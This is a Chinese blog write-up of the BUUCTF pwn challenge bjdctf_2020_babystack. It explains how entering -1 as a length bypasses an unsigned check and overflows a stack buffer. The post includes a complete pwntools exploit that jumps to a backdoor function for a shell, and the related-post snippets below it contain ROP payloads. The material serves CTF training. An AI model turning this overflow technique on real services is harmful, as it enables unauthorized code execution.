bjdctf_2020_babystack

最新推荐文章于 2023-12-11 20:21:21 发布
最新推荐文章于 2023-12-11 20:21:21 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: pwn python CTF WriteUp 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/123704846
版权

bjdctf_2020_babystack

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行。

放进IDA中分析:
在这里插入图片描述

  • __isoc99_scanf("%d", &nbytes);:让用户输入下次输入时接受的数据的长度。
  • read(0, &buf, (unsigned int)nbytes);:变量nbytes用户可控,存在栈溢出。

在Functions name处可发现后门函数backdoor()
在这里插入图片描述

  • 直接返回一个shell

题目思路

  • 变量(unsigned int)nbytes用户可控,且是个无符号函数。
  • 可用-1进行绕过,这样用户可输入的数据长度就十分巨大了。
  • 接着调用backdoor()即可getshell。

步骤解析

无需

完整exp

from pwn import *

#start
# r = process("../buu/bjdctf_2020_babystack")
r = remote("node4.buuoj.cn",25148)
elf = ELF("../buu/bjdctf_2020_babystack")

#params
backdoor_addr = elf.symbols['backdoor']

#attack
r.recvuntil(b"your name:")
r.sendline("-1")
r.recvuntil(b"name?")
payload = b'M' * (0x10 + 8) + p64(backdoor_addr)
r.sendline(payload)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 631
[buuctf]bjdctf_2020_babystack
bjdctf_2020_babystack【BUUCTF
qq_41696518的博客
08-26 537
bjdctf_2020_babystack
bjdctf_2020_babystack题解
OrientalGlass的博客
01-08 329
send是模拟交互的情况,如果使用send(0x111)会有报错,并且发送的字符串要带上换行符,否则会无法结束输入。先输入一个整形数据用于确定buf串需要读入多少个字节,这里后续使用的是0x111。nbytes在buf下方,并且nbytes是qword类型,占8个字节。解释了为什么第一次send要使用字符串类型而不能直接发送int类型。不过这里还有一个异或就是本机运行该程序不能成功获取执行权,非常奇怪。再发送覆盖数据覆盖掉返回地址执行backdoor函数即可。首先输入一个足以覆盖掉返回地址的数字。
CTF buuoj pwn-----第10题: bjdctf_2020_babystack
热门推荐
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
BUU刷题-Pwn-bjdctf_2020_babystack
一个啥也不会的小菜鸡!
06-21 183
首先利用&nbytes变量控制溢出长度,再使用buf实现溢出就可以了。后门函数地址:backdoor:0x4006E6。
justCTF-2020:justCTF 2020
05-24
justCTF-2020 justCTF 2020 和彩云分流: 链接: 提取码:GqUZ
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
bjdctf_2020_babystack 1
CYXMDTT的博客
03-22 297
发现scanf会读入一个输入的数,赋值给nbytes ,之后read读取nbytes大小的字符,说明我们可以溢出任意长度。之后在Functions name处可发现后门函数backdoor。用checksec查看,发现开启了NX保护。执行完程序后用64位IDA进行分析。运行它直接拿到shell。
BJDCTF 2020 babystack2.0
最新发布
2301_79793667的博客
12-11 230
因为第二次所需要读取的数值的字节数大于10,第一次输入的值在第二次作为无符号整型,所以我们需要输入一个负数来同时满足第一次输入和第二次输入,可以输入-1。通过分析,我们发现第一次输入的值不能大于10,否则会退出程序,第一次输入的值将作为第二次通过read函数输入的buf的值的最大字节数。让我们输入数据,随便输入了几个数据,就被退出程序了,那我们检查一下附件,然后用ida打开。通过read函数栈溢出到后门函数的地址0x400726。那我们就用64位ida打开。首先打开环境,并下载附件。找到了后门函数的地址。
BUUCTF bjdctf_2020_babystack
小白垃圾笔记2
04-30 272
有的,所以我们的利用思路就是将返回地址先覆盖为pop rdi;ret 的地址,将参数(/bin/sh)传入rdi。然后再将system的地址填充进去,这样pop rdi;执行ret的时候就会去执行system。那么pop rdi;ret 后边的内容就应该是/bin/sh的地址了。有system函数调用,并且存在/bin/sh。去找有没有pop rdi ret。小白做题笔记而已,不建议阅读。64为程序用rdi传参。read函数存在栈溢出。
CTF】BUUCTF-bjdctf_2020_babystack1
weixin_53394081的博客
03-06 356
PWN
PWN · ret2text】[BJDCTF 2020]babystack
Mr_Fmnwon的博客
04-20 738
作为pwn新手,尽可能在刷题中,记录、学习一些通用的知识点,因此wp是少不了的。本题是一道简单的ret2text。
[BJDCTF 2020]babystack2.0
llovewuzhengzi的博客
10-22 146
不存在file.plt[“backdoor”] plt是外部函数才有的 只能用file.symbol[“backdoor”]HIDWORD作用是取得某个8字节变量(即32位的值)在内存中处于高位的四个字节,即两个word长的数据。LODWORD作用是取得某个8字节变量(即32位的值)在内存中处于低位的四个字节,即两个word长的数据。用file.plt[“system”]不行,因为直接这样覆盖返回地址没有参数。IDA的栈不完全对,保存的ebp都没有显示,所以IDA只能参考。
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。它基于两个大素数的乘积作为公钥的一部分,并使用这两个素数的乘积作为私钥的一部分。RSA算法的安全性基于大数分解的难度,即将一个大数分解为其素数因子的难度。 在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值